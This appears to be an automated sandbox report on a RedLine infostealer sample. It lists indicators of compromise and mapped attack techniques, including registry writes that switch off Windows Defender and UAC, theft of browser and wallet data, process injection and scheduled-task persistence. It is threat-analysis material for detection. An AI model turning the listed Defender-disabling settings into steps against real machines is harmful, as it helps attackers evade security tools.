redline | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nPNySvKypsAzH2kMtfUxg1D3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_61tyeSDJI0ddJYWKwIw2xdn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_61tyeSDJI0ddJYWKwIw2xdn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nPNySvKypsAzH2kMtfUxg1D3.exe

Loads dropped DLL 3 IoCs

pid	Process
1316	rundll32.exe
5932	rundll32.exe
5332	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000100000002b1c5-214.dat	themida
behavioral2/files/0x000100000002b1e4-218.dat	themida
behavioral2/files/0x000100000002b1dc-212.dat	themida
behavioral2/files/0x000100000002b1c5-253.dat	themida
behavioral2/files/0x000100000002b1dc-259.dat	themida
behavioral2/memory/4044-315-0x0000000000B00000-0x0000000000B01000-memory.dmp	themida
behavioral2/files/0x000100000002b1e4-267.dat	themida
behavioral2/memory/4012-343-0x0000000000C10000-0x0000000000C11000-memory.dmp	themida

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	jgs2UAwTKbisdt4bOkhAPSid.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	jgs2UAwTKbisdt4bOkhAPSid.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	jgs2UAwTKbisdt4bOkhAPSid.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	jgs2UAwTKbisdt4bOkhAPSid.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	jgs2UAwTKbisdt4bOkhAPSid.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	jgs2UAwTKbisdt4bOkhAPSid.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	DgSBWhglxTYBqlBAtGfXu_mK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\jgs2UAwTKbisdt4bOkhAPSid.exe = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_61tyeSDJI0ddJYWKwIw2xdn.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nPNySvKypsAzH2kMtfUxg1D3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jgs2UAwTKbisdt4bOkhAPSid.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ipinfo.io
2	geoiptool.com
21	ipinfo.io
46	ipinfo.io
46	ip-api.com
91	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4044	powershell.exe
4012	_61tyeSDJI0ddJYWKwIw2xdn.exe
1008	nPNySvKypsAzH2kMtfUxg1D3.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 3348 set thread context of 4648	3348	Ou3tPfureT.exe	132
PID 4576 set thread context of 1064	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	137
PID 1708 set thread context of 4408	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	136
PID 1532 set thread context of 3244	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	133
PID 4576 set thread context of 3452	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	150
PID 1708 set thread context of 5164	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	163
PID 1532 set thread context of 5252	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	161
PID 1532 set thread context of 5848	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	165
PID 1708 set thread context of 5780	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	167
PID 4576 set thread context of 5588	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	158
PID 1708 set thread context of 5240	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	171
PID 4576 set thread context of 5576	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	170
PID 4560 set thread context of 5892	4560	DgSBWhglxTYBqlBAtGfXu_mK.exe	174
PID 1708 set thread context of 1288	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	175
PID 1532 set thread context of 5560	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	173
PID 4576 set thread context of 5372	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	190
PID 1708 set thread context of 1668	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	184
PID 1532 set thread context of 4856	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	511
PID 1708 set thread context of 576	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	192
PID 1532 set thread context of 2508	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	195
PID 3880 set thread context of 4464	3880	jgs2UAwTKbisdt4bOkhAPSid.exe	201
PID 3856 set thread context of 1216	3856	YzRM8xR8i134nocoOLQ9rJhx.exe	212
PID 3104 set thread context of 1464	3104	Pq1or0IwINY9mydxS_vPWac8.exe	221
PID 1532 set thread context of 5736	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	629
PID 4576 set thread context of 2876	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	214
PID 1532 set thread context of 1196	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	224
PID 1708 set thread context of 3572	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	219
PID 4576 set thread context of 2212	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	223
PID 1532 set thread context of 5500	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	227
PID 4576 set thread context of 4040	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	228
PID 1708 set thread context of 5432	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	507
PID 1532 set thread context of 684	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	505
PID 5708 set thread context of 1528	5708	KU6UUiwSos.exe	231
PID 4576 set thread context of 3292	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	234
PID 1708 set thread context of 1552	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	237
PID 1532 set thread context of 456	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	238
PID 1708 set thread context of 4376	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	240
PID 4576 set thread context of 4200	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	241
PID 1532 set thread context of 6344	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	247
PID 1708 set thread context of 6492	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	246
PID 4576 set thread context of 6536	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	245
PID 1532 set thread context of 6668	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	248
PID 1708 set thread context of 6772	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	249
PID 1532 set thread context of 7028	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	252
PID 4576 set thread context of 6912	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	250
PID 1708 set thread context of 7056	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	604
PID 4576 set thread context of 916	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	256
PID 5076 set thread context of 6392	5076	Q9T1EZBqKuonPNpvLaHnXaQ8.exe	554
PID 1708 set thread context of 4972	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	257
PID 1708 set thread context of 6800	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	266
PID 4576 set thread context of 6748	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	265
PID 1532 set thread context of 6952	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	264
PID 1708 set thread context of 1952	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	268
PID 4576 set thread context of 5288	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	269
PID 1532 set thread context of 672	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	270
PID 4576 set thread context of 4352	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	279
PID 1708 set thread context of 4116	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	278
PID 1532 set thread context of 6816	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	277
PID 4576 set thread context of 3648	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	280
PID 1532 set thread context of 2056	1532	AUCcg4JaWZdP0U0bFGmyJ373.exe	283
PID 4576 set thread context of 1304	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	284
PID 1708 set thread context of 6268	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	285
PID 4576 set thread context of 5540	4576	BxDaHyAYlcwOccGxE4pXqU5I.exe	289
PID 1708 set thread context of 588	1708	DgSBWhglxTYBqlBAtGfXu_mK.exe	290

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\PROGRA~3\wiqjp.tmp	WerFault.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Jmpyax2pCVTdmC6SwBiLxwIY.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Jmpyax2pCVTdmC6SwBiLxwIY.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	sc.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	sc.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	sc.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 36 IoCs

pid	pid_target	Process	procid_target
1564	4856	WerFault.exe	80
2384	5084	WerFault.exe	89
5384	3348	WerFault.exe	116
5972	1560	WerFault.exe	101
2236	3680	WerFault.exe	92
5720	4192	WerFault.exe	96
1924	1316	WerFault.exe	191
4584	1316	WerFault.exe	191
1376	2508	WerFault.exe	195
6320	444	WerFault.exe	105
6572	5708	WerFault.exe	222
6160	6748	WerFault.exe	265
2112	5332	WerFault.exe	232
720	4796	WerFault.exe	287
2980	1308	WerFault.exe	272
7792	6964	WerFault.exe	344
8780	4432	WerFault.exe	297
8276	8316	WerFault.exe	371
5284	5512	WerFault.exe	429
5508	6056	WerFault.exe	438
5736	5124	WerFault.exe	206
6732	3660	WerFault.exe	457
440	3088	WerFault.exe	202
4460	444	WerFault.exe	524
7088	6276	WerFault.exe	535
2780	1396	WerFault.exe	630
10028	2148	WerFault.exe	656
5332	5152	WerFault.exe	672
4300	7692	WerFault.exe	673
10544	10472	WerFault.exe	690
10352	11044	WerFault.exe	716
5260	932	WerFault.exe	24
11572	11964	WerFault.exe	826
14164	6024	WerFault.exe	855
3764	12648	WerFault.exe	857
20020	19856	WerFault.exe	1007

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nP1C_KI4iAQan_hXudLtr9p8.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nP1C_KI4iAQan_hXudLtr9p8.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nP1C_KI4iAQan_hXudLtr9p8.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5108	schtasks.exe
344	schtasks.exe

Enumerates system info in registry 2 TTPs 22 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	BxDaHyAYlcwOccGxE4pXqU5I.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	AUCcg4JaWZdP0U0bFGmyJ373.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	aspnet_compiler.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	BxDaHyAYlcwOccGxE4pXqU5I.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5232	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5072	Setup (5).exe
5072	Setup (5).exe
1320	AdvancedRun.exe
1320	AdvancedRun.exe
1320	AdvancedRun.exe
1320	AdvancedRun.exe
1564	WerFault.exe
1564	WerFault.exe
2384	AUCcg4JaWZdP0U0bFGmyJ373.exe
2384	AUCcg4JaWZdP0U0bFGmyJ373.exe
5384	WerFault.exe
5384	WerFault.exe
5972	WerFault.exe
5972	WerFault.exe
5892	nP1C_KI4iAQan_hXudLtr9p8.exe
5892	nP1C_KI4iAQan_hXudLtr9p8.exe
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
2236	aspnet_compiler.exe
2236	aspnet_compiler.exe
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
5720	WerFault.exe
5720	WerFault.exe
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
3104	Pq1or0IwINY9mydxS_vPWac8.exe
3104	Pq1or0IwINY9mydxS_vPWac8.exe
3208	Process not Found
3208	Process not Found
3208	Process not Found
3208	Process not Found
1924	WerFault.exe
1924	WerFault.exe
3880	jgs2UAwTKbisdt4bOkhAPSid.exe
3880	jgs2UAwTKbisdt4bOkhAPSid.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3208	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5892	nP1C_KI4iAQan_hXudLtr9p8.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2464	hEjARv44mnptmc7nqphV0WYa.exe
Token: SeDebugPrivilege	1320	AdvancedRun.exe
Token: SeImpersonatePrivilege	1320	AdvancedRun.exe
Token: SeRestorePrivilege	1564	WerFault.exe
Token: SeBackupPrivilege	1564	WerFault.exe
Token: SeBackupPrivilege	1564	WerFault.exe
Token: SeTcbPrivilege	1832	svchost.exe
Token: SeTcbPrivilege	1832	svchost.exe
Token: SeDebugPrivilege	5232	Conhost.exe
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeDebugPrivilege	3880	jgs2UAwTKbisdt4bOkhAPSid.exe
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
